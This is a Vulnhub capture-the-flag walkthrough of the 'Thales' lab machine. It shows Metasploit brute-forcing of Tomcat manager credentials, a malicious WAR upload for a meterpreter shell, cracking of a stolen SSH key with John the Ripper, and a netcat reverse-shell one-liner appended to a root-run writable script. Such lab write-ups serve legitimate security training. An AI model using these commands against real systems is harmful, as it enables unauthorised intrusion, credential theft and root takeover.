Thales1 Vulnhub Walkthrough
“Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to exploit a vulnerability in the Tomcat Application Manager instance to gain access to the system and we will also learn how to exploit a script running with root privileges to gain root access. So, let us see how to solve this machine in the proper steps.
Download Thales from here
Level: Easy (For Beginners)
- Abusing HTTP
- John the Ripper
- writable script
- Capture the Flag
Initially, we will scan the network to find the Victim machine IP using the netdiscover command.
We find that the Victim machine has the IP address as 192.168.1.175
Further, we ran an aggressive scan (-A) for open port enumeration where we found the following port details:
nmap -A 192.168.1.175
According to the Nmap output, we get
- on port 22 SSH server running (OpenSSH)
- on port 8080 HTTP service running (Apache tomcat)
Now let’s see if we can get any interesting information from port 8080. Because the Apache Tomcat Server is running on port 8080, we can see the result right away in the browser.
We note the Tomcat version number: 9.0.52
Now, let’s start msfconsole. We will be using the auxiliary scanner to bruteforce tomcat manager login. Here we are using Metasploit default wordlist for password brute force attack.
msfconsole -q use auxiliary/scanner/http/tomcat_mgr_login set rhosts 192.168.1.175 set username tomcat set verbose false exploit
as result, the password of tomcat that we get is tomcat:role1
As we enumerated Tomcat Manager Login creds thus we can try reverse connection by injecting malicious Java payload. We will use this exploit to get a meterpreter shell.
use exploit/multi/http/tomcat_mgr_upload set rhosts 192.168.1.175 set rport 8080 set httpusername tomcat set httppassword role1 exploit
After getting the meterpreter shell we navigate to the ‘home’ directory and there we can find a sub-directory named ‘thales’. Entering the ‘thales’ directory we get two files: user.txt and notes.txt. We also find a .ssh directory.
cd /home ls cd thales ls
We observe that the public key (id_rsa.pub) and the private key(id_rsa) are present on the victim machine. The private key is used to login. So now we proceed to download the private key onto our kali machine.
cd .ssh ls download id_rsa /root/Desktop
John the Ripper
Here we have downloaded id_rsa file that is password-protected, now, we need to convert the id_rsa key into a hash that can be cracked using ‘john’. First, we use the command ‘ssh2john’ to convert the key into a hash.
locate ssh2john /usr/share/john/ssh2john.py id_rsa > sshhash
Now we can attempt to crack the hash with john the ripper. We will use the wordlist ‘rockyou.txt’.
john --wordlist=/usr/share/wordlists/rockyou.txt sshash
Hash is cracked and we get the password: vodka06
After we get a shell, we will upgrade our non-interactive shell to a partially interactive one using the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
Since we have cracked the password of user ‘thales’, let’s switch to the thales user.
After switching to thales user, we use the command “id” to know about the real and effective ‘user and group’ IDs. We find that thales is a non-root user.
We now use “ sudo -l “ to check which commands can be run as root by the user thales.
We find that user thales does not have the ability to run any command as root. So now we navigate around in search of some interesting files.
We get a hint on note.txt that a backup script is prepared for us in the directory /usr/local/bin/backup.sh
Now, let’s go and check the backup.sh file. We investigate and find that this file has read, written, and execute permissions and the file is owned by the root.
cat /usr/local/bin/backup.sh ls -la /usr/local/bin/backup.sh
Since the backup.sh is writable thus we can edit this script by injecting reverse shell payload and expect to get root shell access.
On our attacking machine ( kali ) we will start a Netcat listener to receive the shell, on port 8888
nc -lvp 8888
Execute the following command in the terminal to append the backup.sh script for injecting malicious payload.
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.3 8888 >/tmp/f" >>backup.sh
since it was a backup script that run automatically, thus it will give root privilege reverse shell over port 8888.
Capture the root flag
id cd /root ls cat root.txt
Author: Sakshi Gurao is a Researcher and Technical Writer at Hacking Articles, Red Teamer, Penetration Tester. Contact Linkedin